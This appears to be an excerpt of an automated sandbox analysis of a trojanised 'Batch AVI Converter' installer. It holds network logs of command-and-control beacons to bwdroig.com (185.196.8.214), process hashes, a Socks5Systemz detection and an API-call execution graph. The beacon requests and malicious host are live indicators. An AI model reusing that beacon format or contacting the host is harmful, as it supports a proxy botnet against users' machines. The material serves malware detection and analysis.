User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:03.550364971 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49761 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:03.678267002 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:04.444044113 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 49762 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:04.598109961 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:05.338042974 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 49763 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:05.459992886 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:06.175821066 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 49764 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:06.304177999 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:07.003262997 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Target ID: 0
Start time: 15:05:00
Start date: 11/09/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x400000
File size: 3'488'773 bytes
MD5 hash: 984C885DE9FEA28A60A25B278F424F50
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

                                                            Target ID:1
                                                            Start time:15:05:00
                                                            Start date:11/09/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x400000
                                                            File size:706'560 bytes
                                                            MD5 hash:F02C8C4B73C31FD56FD90DC77235363B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:15:05:01
                                                            Start date:11/09/2024
                                                            Path:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i
                                                            Imagebase:0x400000
                                                            File size:2'644'388 bytes
                                                            MD5 hash:91646D419442B59CE172BCBAE8A2A8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:15:05:45
                                                            Start date:11/09/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                            Imagebase:0x7ff7e52b0000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false


                                                              Execution Graph

                                                              Execution Coverage:21.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:2.4%
                                                              Total number of Nodes:1521
                                                              Total number of Limit Nodes:22
                                                              execution_graph 5451 407548 5452 407554 CloseHandle 5451->5452 5453 40755d 5451->5453 5452->5453 6688 402b48 RaiseException 5893 407749 5894 4076dc WriteFile 5893->5894 5899 407724 5893->5899 5895 4076e8 5894->5895 5896 4076ef 5894->5896 5897 40748c 35 API calls 5895->5897 5898 407700 5896->5898 5900 4073ec 34 API calls 5896->5900 5897->5896 5899->5893 5901 4077e0 5899->5901 5900->5898 5902 4078db InterlockedExchange 5901->5902 5904 407890 5901->5904 5903 4078e7 5902->5903 6689 40294a 6690 402952 6689->6690 6691 403554 4 API calls 6690->6691 6692 402967 6690->6692 6691->6690 6693 403f4a 6694 403f53 6693->6694 6696 403f5c 6693->6696 6697 403f07 6694->6697 6700 403f09 6697->6700 6699 403f3c 6699->6696 6701 403154 4 API calls 6700->6701 6703 403e9c 6700->6703 6706 403f3d 6700->6706 6720 403e9c 6700->6720 6701->6700 6702 403ef2 6705 402674 4 API calls 6702->6705 6703->6699 6703->6702 6709 403ea9 6703->6709 6711 403e8e 6703->6711 6708 403ecf 6705->6708 6706->6696 6708->6696 6709->6708 6710 402674 4 API calls 6709->6710 6710->6708 6712 403e4c 6711->6712 6713 403e67 6712->6713 6714 403e62 6712->6714 6715 403e7b 6712->6715 6718 403e78 6713->6718 6719 402674 4 API calls 6713->6719 6717 403cc8 4 API calls 6714->6717 6716 402674 4 API calls 6715->6716 6716->6718 6717->6713 6718->6702 6718->6709 6719->6718 6721 403ed7 6720->6721 6727 403ea9 6720->6727 6723 403ef2 6721->6723 6724 403e8e 4 API calls 6721->6724 6722 403ecf 6722->6700 6725 402674 4 API calls 6723->6725 6726 403ee6 6724->6726 6725->6722 6726->6723 6726->6727 6727->6722 6728 402674 4 API calls 6727->6728 6728->6722 6247 40ac4f 6248 40abc1 6247->6248 6249 4094d8 9 API calls 6248->6249 6251 40abed 6248->6251 6249->6251 6250 40ac06 6252 40ac1a 6250->6252 6253 40ac0f DestroyWindow 6250->6253 6251->6250 6254 40ac00 RemoveDirectoryA 6251->6254 6255 40ac42 6252->6255 6256 40357c 4 API calls 6252->6256 6253->6252 6254->6250 6257 40ac38 6256->6257 6258 4025ac 4 
API calls 6257->6258 6258->6255 6259 403a52 6260 403a5a WriteFile 6259->6260 6262 403a74 6259->6262 6261 403a78 GetLastError 6260->6261 6260->6262 6261->6262 6263 402654 6264 403154 4 API calls 6263->6264 6265 402614 6264->6265 6266 402632 6265->6266 6267 403154 4 API calls 6265->6267 6267->6266 6268 40ac56 6269 40ac5d 6268->6269 6271 40ac88 6268->6271 6278 409448 6269->6278 6273 403198 4 API calls 6271->6273 6272 40ac62 6272->6271 6275 40ac80 MessageBoxA 6272->6275 6274 40acc0 6273->6274 6276 403198 4 API calls 6274->6276 6275->6271 6277 40acc8 6276->6277 6279 409454 GetCurrentProcess OpenProcessToken 6278->6279 6280 4094af ExitWindowsEx 6278->6280 6281 409466 6279->6281 6282 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6279->6282 6280->6281 6281->6272 6282->6280 6282->6281 6737 40995e 6740 409960 6737->6740 6738 40999e CallWindowProcA 6739 409982 6738->6739 6740->6738 6740->6739 6741 409960 6742 409982 6741->6742 6744 40996f 6741->6744 6743 40999e CallWindowProcA 6743->6742 6744->6742 6744->6743 6745 405160 6746 405173 6745->6746 6747 404e58 33 API calls 6746->6747 6748 405187 6747->6748 6283 402e64 6284 402e69 6283->6284 6285 402e7a RtlUnwind 6284->6285 6286 402e5e 6284->6286 6287 402e9d 6285->6287 5905 40766c SetFilePointer 5906 4076a3 5905->5906 5907 407693 GetLastError 5905->5907 5907->5906 5908 40769c 5907->5908 5909 40748c 35 API calls 5908->5909 5909->5906 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6761 403f7d 6762 403fa2 6761->6762 6765 403f84 6761->6765 6764 403e8e 4 API calls 6762->6764 6762->6765 6763 403f8c 6764->6765 6765->6763 6766 402674 4 API calls 6765->6766 6767 403fca 6766->6767 6768 403d02 6770 403d12 6768->6770 6769 403ddf ExitProcess 6770->6769 6771 403db8 6770->6771 6775 403dea 6770->6775 6778 403da4 6770->6778 6779 403d8f MessageBoxA 6770->6779 6772 403cc8 4 API calls 6771->6772 6773 403dc2 6772->6773 6774 403cc8 4 API calls 6773->6774 6776 403dcc 6774->6776 6788 4019dc 6776->6788 6784 403fe4 6778->6784 6779->6771 
6780 403dd1 6780->6769 6780->6775 6785 403fe8 6784->6785 6786 403f07 4 API calls 6785->6786 6787 404006 6786->6787 6789 401abb 6788->6789 6790 4019ed 6788->6790 6789->6780 6791 401a04 RtlEnterCriticalSection 6790->6791 6792 401a0e LocalFree 6790->6792 6791->6792 6793 401a41 6792->6793 6794 401a2f VirtualFree 6793->6794 6795 401a49 6793->6795 6794->6793 6796 401a70 LocalFree 6795->6796 6797 401a87 6795->6797 6796->6796 6796->6797 6798 401aa9 RtlDeleteCriticalSection 6797->6798 6799 401a9f RtlLeaveCriticalSection 6797->6799 6798->6780 6799->6798 6306 404206 6307 4041cc 6306->6307 6308 40420a 6306->6308 6309 403154 4 API calls 6308->6309 6310 404282 6308->6310 6311 404323 6309->6311 6312 402c08 6313 402c82 6312->6313 6316 402c19 6312->6316 6314 402c56 RtlUnwind 6315 403154 4 API calls 6314->6315 6315->6313 6316->6313 6316->6314 6319 402b28 6316->6319 6320 402b31 RaiseException 6319->6320 6321 402b47 6319->6321 6320->6321 6321->6314 6322 408c10 6323 408c17 6322->6323 6324 403198 4 API calls 6323->6324 6332 408cb1 6324->6332 6325 408cdc 6326 4031b8 4 API calls 6325->6326 6327 408d69 6326->6327 6328 408cc8 6330 4032fc 18 API calls 6328->6330 6329 403278 18 API calls 6329->6332 6330->6325 6331 4032fc 18 API calls 6331->6332 6332->6325 6332->6328 6332->6329 6332->6331 6337 40a814 6338 40a839 6337->6338 6339 40993c 29 API calls 6338->6339 6342 40a83e 6339->6342 6340 40a891 6371 4026c4 GetSystemTime 6340->6371 6342->6340 6345 408dd8 18 API calls 6342->6345 6343 40a896 6344 409330 46 API calls 6343->6344 6346 40a89e 6344->6346 6347 40a86d 6345->6347 6348 4031e8 18 API calls 6346->6348 6351 40a875 MessageBoxA 6347->6351 6349 40a8ab 6348->6349 6350 406928 19 API calls 6349->6350 6352 40a8b8 6350->6352 6351->6340 6353 40a882 6351->6353 6354 4066c0 19 API calls 6352->6354 6355 405864 19 API calls 6353->6355 6356 40a8c8 6354->6356 6355->6340 6357 406638 19 API calls 6356->6357 6358 40a8d9 6357->6358 6359 403340 18 API calls 6358->6359 6360 40a8e7 6359->6360 6361 4031e8 18 API 
calls 6360->6361 6362 40a8f7 6361->6362 6363 4074e0 37 API calls 6362->6363 6364 40a936 6363->6364 6365 402594 18 API calls 6364->6365 6366 40a956 6365->6366 6367 407a28 19 API calls 6366->6367 6368 40a998 6367->6368 6369 407cb8 35 API calls 6368->6369 6370 40a9bf 6369->6370 6371->6343 5449 407017 5450 407008 SetErrorMode 5449->5450 6372 403018 6373 403070 6372->6373 6374 403025 6372->6374 6375 40302a RtlUnwind 6374->6375 6376 40304e 6375->6376 6378 402f78 6376->6378 6379 402be8 6376->6379 6380 402bf1 RaiseException 6379->6380 6381 402c04 6379->6381 6380->6381 6381->6373 6386 40901e 6387 409010 6386->6387 6388 408fac Wow64RevertWow64FsRedirection 6387->6388 6389 409018 6388->6389 6390 409020 SetLastError 6391 409029 6390->6391 6406 403a28 ReadFile 6407 403a46 6406->6407 6408 403a49 GetLastError 6406->6408 5910 40762c ReadFile 5911 407663 5910->5911 5912 40764c 5910->5912 5913 407652 GetLastError 5912->5913 5914 40765c 5912->5914 5913->5911 5913->5914 5915 40748c 35 API calls 5914->5915 5915->5911 6810 40712e 6811 407118 6810->6811 6812 403198 4 API calls 6811->6812 6813 407120 6812->6813 6814 403198 4 API calls 6813->6814 6815 407128 6814->6815 5930 40a82f 5931 409ae8 18 API calls 5930->5931 5932 40a834 5931->5932 5933 40a839 5932->5933 5934 402f24 5 API calls 5932->5934 5967 40993c 5933->5967 5934->5933 5936 40a891 5972 4026c4 GetSystemTime 5936->5972 5938 40a83e 5938->5936 6033 408dd8 5938->6033 5939 40a896 5973 409330 5939->5973 5943 40a86d 5947 40a875 MessageBoxA 5943->5947 5944 4031e8 18 API calls 5945 40a8ab 5944->5945 5991 406928 5945->5991 5947->5936 5949 40a882 5947->5949 6036 405864 5949->6036 5954 40a8d9 6018 403340 5954->6018 5956 40a8e7 5957 4031e8 18 API calls 5956->5957 5958 40a8f7 5957->5958 5959 4074e0 37 API calls 5958->5959 5960 40a936 5959->5960 5961 402594 18 API calls 5960->5961 5962 40a956 5961->5962 5963 407a28 19 API calls 5962->5963 5964 40a998 5963->5964 5965 407cb8 35 API calls 5964->5965 5966 40a9bf 5965->5966 6040 40953c 5967->6040 
5970 4098cc 19 API calls 5971 40995c 5970->5971 5971->5938 5972->5939 5980 409350 5973->5980 5976 409375 CreateDirectoryA 5977 4093ed 5976->5977 5978 40937f GetLastError 5976->5978 5979 40322c 4 API calls 5977->5979 5978->5980 5982 4093f7 5979->5982 5980->5976 5981 408dd8 18 API calls 5980->5981 5983 404c94 33 API calls 5980->5983 5986 407284 19 API calls 5980->5986 5989 408da8 18 API calls 5980->5989 5990 405890 18 API calls 5980->5990 6096 406cf4 5980->6096 6119 409224 5980->6119 5981->5980 5984 4031b8 4 API calls 5982->5984 5983->5980 5985 409411 5984->5985 5987 4031b8 4 API calls 5985->5987 5986->5980 5988 40941e 5987->5988 5988->5944 5989->5980 5990->5980 6225 406820 5991->6225 5994 403454 18 API calls 5995 40694a 5994->5995 5996 4066c0 5995->5996 6230 4068e4 5996->6230 5999 4066f0 6002 403340 18 API calls 5999->6002 6000 4066fe 6001 403454 18 API calls 6000->6001 6003 406711 6001->6003 6004 4066fc 6002->6004 6005 403340 18 API calls 6003->6005 6006 403198 4 API calls 6004->6006 6005->6004 6007 406733 6006->6007 6008 406638 6007->6008 6009 406642 6008->6009 6010 406665 6008->6010 6236 406950 6009->6236 6012 40322c 4 API calls 6010->6012 6014 40666e 6012->6014 6013 406649 6013->6010 6015 406654 6013->6015 6014->5954 6016 403340 18 API calls 6015->6016 6017 406662 6016->6017 6017->5954 6019 403344 6018->6019 6020 4033a5 6018->6020 6021 4031e8 6019->6021 6022 40334c 6019->6022 6026 403254 18 API calls 6021->6026 6028 4031fc 6021->6028 6022->6020 6024 40335b 6022->6024 6027 4031e8 18 API calls 6022->6027 6023 403228 6023->5956 6025 403254 18 API calls 6024->6025 6030 403375 6025->6030 6026->6028 6027->6024 6028->6023 6029 4025ac 4 API calls 6028->6029 6029->6023 6031 4031e8 18 API calls 6030->6031 6032 4033a1 6031->6032 6032->5956 6034 408da8 18 API calls 6033->6034 6035 408df4 6034->6035 6035->5943 6037 405869 6036->6037 6038 405940 19 API calls 6037->6038 6039 40587b 6038->6039 6039->6039 6047 40955b 6040->6047 6041 409590 6043 40959d GetUserDefaultLangID 
6041->6043 6048 409592 6041->6048 6042 409594 6052 407024 GetModuleHandleA GetProcAddress 6042->6052 6043->6048 6046 40956f 6046->5970 6047->6041 6047->6042 6047->6046 6048->6046 6049 4095cb GetACP 6048->6049 6050 4095ef 6048->6050 6049->6046 6049->6048 6050->6046 6051 409615 GetACP 6050->6051 6051->6046 6051->6050 6053 407067 6052->6053 6054 40705e 6052->6054 6055 407070 6053->6055 6056 4070a8 6053->6056 6063 403198 4 API calls 6054->6063 6073 406f68 6055->6073 6057 406f68 RegOpenKeyExA 6056->6057 6061 4070c1 6057->6061 6059 407089 6060 4070de 6059->6060 6076 406f5c 6059->6076 6065 40322c 4 API calls 6060->6065 6061->6060 6064 406f5c 20 API calls 6061->6064 6067 407120 6063->6067 6068 4070d5 RegCloseKey 6064->6068 6069 4070eb 6065->6069 6070 403198 4 API calls 6067->6070 6068->6060 6071 4032fc 18 API calls 6069->6071 6072 407128 6070->6072 6071->6054 6072->6048 6074 406f73 6073->6074 6075 406f79 RegOpenKeyExA 6073->6075 6074->6075 6075->6059 6079 406e10 6076->6079 6080 406e36 RegQueryValueExA 6079->6080 6081 406e59 6080->6081 6086 406e7b 6080->6086 6082 406e73 6081->6082 6081->6086 6087 403278 18 API calls 6081->6087 6088 403420 18 API calls 6081->6088 6084 403198 4 API calls 6082->6084 6083 403198 4 API calls 6085 406f47 RegCloseKey 6083->6085 6084->6086 6085->6060 6086->6083 6087->6081 6089 406eb0 RegQueryValueExA 6088->6089 6089->6080 6090 406ecc 6089->6090 6090->6086 6091 4034f0 18 API calls 6090->6091 6092 406f0e 6091->6092 6093 406f20 6092->6093 6095 403420 18 API calls 6092->6095 6094 4031e8 18 API calls 6093->6094 6094->6086 6095->6093 6138 406a58 6096->6138 6099 406d26 6101 406a58 19 API calls 6099->6101 6103 406d72 6099->6103 6102 406d36 6101->6102 6104 406d42 6102->6104 6107 406a34 21 API calls 6102->6107 6146 406888 6103->6146 6104->6103 6105 406d67 6104->6105 6108 406a58 19 API calls 6104->6108 6105->6103 6158 406cc8 GetWindowsDirectoryA 6105->6158 6107->6104 6111 406d5b 6108->6111 6111->6105 6114 406a34 21 API calls 6111->6114 6112 406638 19 API 
calls 6113 406d87 6112->6113 6115 40322c 4 API calls 6113->6115 6114->6105 6116 406d91 6115->6116 6117 4031b8 4 API calls 6116->6117 6118 406dab 6117->6118 6118->5980 6120 409244 6119->6120 6121 406638 19 API calls 6120->6121 6122 40925d 6121->6122 6123 40322c 4 API calls 6122->6123 6130 409268 6123->6130 6124 406978 20 API calls 6124->6130 6126 408dd8 18 API calls 6126->6130 6127 4033b4 18 API calls 6127->6130 6128 405890 18 API calls 6128->6130 6130->6124 6130->6126 6130->6127 6130->6128 6131 4092e4 6130->6131 6198 4091b0 6130->6198 6206 409034 6130->6206 6132 40322c 4 API calls 6131->6132 6133 4092ef 6132->6133 6134 4031b8 4 API calls 6133->6134 6135 409309 6134->6135 6136 403198 4 API calls 6135->6136 6137 409311 6136->6137 6137->5980 6139 4034f0 18 API calls 6138->6139 6140 406a6b 6139->6140 6141 406a82 GetEnvironmentVariableA 6140->6141 6145 406a95 6140->6145 6160 406dec 6140->6160 6141->6140 6142 406a8e 6141->6142 6143 403198 4 API calls 6142->6143 6143->6145 6145->6099 6155 406a34 6145->6155 6147 403414 6146->6147 6148 4068ab GetFullPathNameA 6147->6148 6149 4068b7 6148->6149 6150 4068ce 6148->6150 6149->6150 6152 4068bf 6149->6152 6151 40322c 4 API calls 6150->6151 6153 4068cc 6151->6153 6154 403278 18 API calls 6152->6154 6153->6112 6154->6153 6164 4069dc 6155->6164 6159 406ce9 6158->6159 6159->6103 6161 406dfa 6160->6161 6162 4034f0 18 API calls 6161->6162 6163 406e08 6162->6163 6163->6140 6171 406978 6164->6171 6166 4069fe 6167 406a06 GetFileAttributesA 6166->6167 6168 406a1b 6167->6168 6169 403198 4 API calls 6168->6169 6170 406a23 6169->6170 6170->6099 6181 406744 6171->6181 6173 4069b0 6176 4069c6 6173->6176 6177 4069bb 6173->6177 6175 406989 6175->6173 6188 406970 CharPrevA 6175->6188 6189 403454 6176->6189 6179 40322c 4 API calls 6177->6179 6180 4069c4 6179->6180 6180->6166 6182 406755 6181->6182 6183 4067b9 6182->6183 6187 406773 6182->6187 6184 406680 IsDBCSLeadByte 6183->6184 6185 4067b4 6183->6185 6184->6185 6185->6175 6187->6185 6196 406680 
IsDBCSLeadByte 6187->6196 6188->6175 6190 403486 6189->6190 6191 403459 6189->6191 6192 403198 4 API calls 6190->6192 6191->6190 6194 40346d 6191->6194 6193 40347c 6192->6193 6193->6180 6195 403278 18 API calls 6194->6195 6195->6193 6197 406694 6196->6197 6197->6187 6199 403198 4 API calls 6198->6199 6201 4091d1 6199->6201 6203 4091fe 6201->6203 6215 4032a8 6201->6215 6218 403494 6201->6218 6204 403198 4 API calls 6203->6204 6205 409213 6204->6205 6205->6130 6207 408f70 2 API calls 6206->6207 6208 40904a 6207->6208 6209 40904e 6208->6209 6222 406a48 6208->6222 6209->6130 6212 409081 6213 408fac Wow64RevertWow64FsRedirection 6212->6213 6214 409089 6213->6214 6214->6130 6216 403278 18 API calls 6215->6216 6217 4032b5 6216->6217 6217->6201 6219 403498 6218->6219 6221 4034c3 6218->6221 6220 4034f0 18 API calls 6219->6220 6220->6221 6221->6201 6223 4069dc 21 API calls 6222->6223 6224 406a52 GetLastError 6223->6224 6224->6212 6226 406744 IsDBCSLeadByte 6225->6226 6228 406835 6226->6228 6227 40687f 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 4068f3 6230->6231 6232 406820 IsDBCSLeadByte 6231->6232 6235 4068fe 6232->6235 6233 4066ea 6233->5999 6233->6000 6234 406680 IsDBCSLeadByte 6234->6235 6235->6233 6235->6234 6237 406957 6236->6237 6238 40695b 6236->6238 6237->6013 6241 406970 CharPrevA 6238->6241 6240 40696c 6240->6013 6241->6240 6816 408f30 6819 408dfc 6816->6819 6820 408e05 6819->6820 6821 403198 4 API calls 6820->6821 6822 408e13 6820->6822 6821->6820 6823 403932 6824 403924 6823->6824 6825 40374c VariantClear 6824->6825 6826 40392c 6825->6826 5386 4075c4 SetFilePointer 5387 4075f7 5386->5387 5388 4075e7 GetLastError 5386->5388 5388->5387 5389 4075f0 5388->5389 5391 40748c GetLastError 5389->5391 5394 4073ec 5391->5394 5395 407284 19 API calls 5394->5395 5396 407414 5395->5396 5397 407434 5396->5397 5399 405194 33 API calls 5396->5399 5398 405890 18 API calls 5397->5398 5400 407443 5398->5400 5399->5397 5401 403198 4 API calls 
5400->5401 5402 407460 5401->5402 5402->5387 6417 4076c8 WriteFile 6418 4076e8 6417->6418 6421 4076ef 6417->6421 6419 40748c 35 API calls 6418->6419 6419->6421 6420 407700 6421->6420 6422 4073ec 34 API calls 6421->6422 6422->6420 6423 402ccc 6426 402cfe 6423->6426 6427 402cdd 6423->6427 6424 402d88 RtlUnwind 6425 403154 4 API calls 6424->6425 6425->6426 6427->6424 6427->6426 6428 402b28 RaiseException 6427->6428 6429 402d7f 6428->6429 6429->6424 6835 403fcd 6836 403f07 4 API calls 6835->6836 6837 403fd6 6836->6837 6838 403e9c 4 API calls 6837->6838 6839 403fe2 6838->6839 6436 4024d0 6437 4024e4 6436->6437 6438 4024e9 6436->6438 6441 401918 4 API calls 6437->6441 6439 402518 6438->6439 6440 40250e RtlEnterCriticalSection 6438->6440 6443 4024ed 6438->6443 6451 402300 6439->6451 6440->6439 6441->6438 6444 402525 6447 402581 6444->6447 6448 402577 RtlLeaveCriticalSection 6444->6448 6446 401fd4 14 API calls 6449 402531 6446->6449 6448->6447 6449->6444 6450 40215c 9 API calls 6449->6450 6450->6444 6452 402314 6451->6452 6454 4023b8 6452->6454 6455 402335 6452->6455 6453 402344 6453->6444 6453->6446 6454->6453 6456 401d80 9 API calls 6454->6456 6459 402455 6454->6459 6461 401e84 6454->6461 6455->6453 6457 401b74 9 API calls 6455->6457 6456->6454 6457->6453 6459->6453 6460 401d00 9 API calls 6459->6460 6460->6453 6466 401768 6461->6466 6463 401e99 6464 401ea6 6463->6464 6465 401dcc 9 API calls 6463->6465 6464->6454 6465->6464 6467 401787 6466->6467 6468 40183b 6467->6468 6469 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6467->6469 6470 40132c LocalAlloc 6467->6470 6472 401821 6467->6472 6474 4017d6 6467->6474 6471 4015c4 VirtualAlloc 6468->6471 6475 4017e7 6468->6475 6469->6467 6470->6467 6471->6475 6473 40150c VirtualFree 6472->6473 6473->6475 6476 40150c VirtualFree 6474->6476 6475->6463 6476->6475 6477 4028d2 6478 4028da 6477->6478 6479 403554 4 API calls 6478->6479 6480 4028ef 6478->6480 6479->6478 6481 4025ac 4 API calls 6480->6481 6482 4028f4 6481->6482 
6840 4019d3 6841 4019ba 6840->6841 6842 4019c3 RtlLeaveCriticalSection 6841->6842 6843 4019cd 6841->6843 6842->6843 5403 407fd4 5404 407fe6 5403->5404 5406 407fed 5403->5406 5414 407f10 5404->5414 5407 408021 5406->5407 5408 408015 5406->5408 5409 408017 5406->5409 5410 40804e 5407->5410 5412 407d7c 33 API calls 5407->5412 5428 407e2c 5408->5428 5425 407d7c 5409->5425 5412->5410 5415 407f25 5414->5415 5416 407d7c 33 API calls 5415->5416 5417 407f34 5415->5417 5416->5417 5418 407f6e 5417->5418 5420 407d7c 33 API calls 5417->5420 5419 407f82 5418->5419 5421 407d7c 33 API calls 5418->5421 5424 407fae 5419->5424 5435 407eb8 5419->5435 5420->5418 5421->5419 5424->5406 5438 4058c4 5425->5438 5427 407d9e 5427->5407 5429 405194 33 API calls 5428->5429 5430 407e57 5429->5430 5446 407de4 5430->5446 5432 407e5f 5433 403198 4 API calls 5432->5433 5434 407e74 5433->5434 5434->5407 5436 407ec7 VirtualFree 5435->5436 5437 407ed9 VirtualAlloc 5435->5437 5436->5437 5437->5424 5440 4058d0 5438->5440 5439 405194 33 API calls 5441 4058fd 5439->5441 5440->5439 5442 4031e8 18 API calls 5441->5442 5443 405908 5442->5443 5444 403198 4 API calls 5443->5444 5445 40591d 5444->5445 5445->5427 5447 4058c4 33 API calls 5446->5447 5448 407e06 5447->5448 5448->5432 6483 405ad4 6484 405ae4 6483->6484 6485 405adc 6483->6485 6486 405ae2 6485->6486 6487 405aeb 6485->6487 6490 405a4c 6486->6490 6488 405940 19 API calls 6487->6488 6488->6484 6491 405a54 6490->6491 6492 405a6e 6491->6492 6493 403154 4 API calls 6491->6493 6494 405a73 6492->6494 6495 405a8a 6492->6495 6493->6491 6496 405940 19 API calls 6494->6496 6497 403154 4 API calls 6495->6497 6498 405a86 6496->6498 6499 405a8f 6497->6499 6501 403154 4 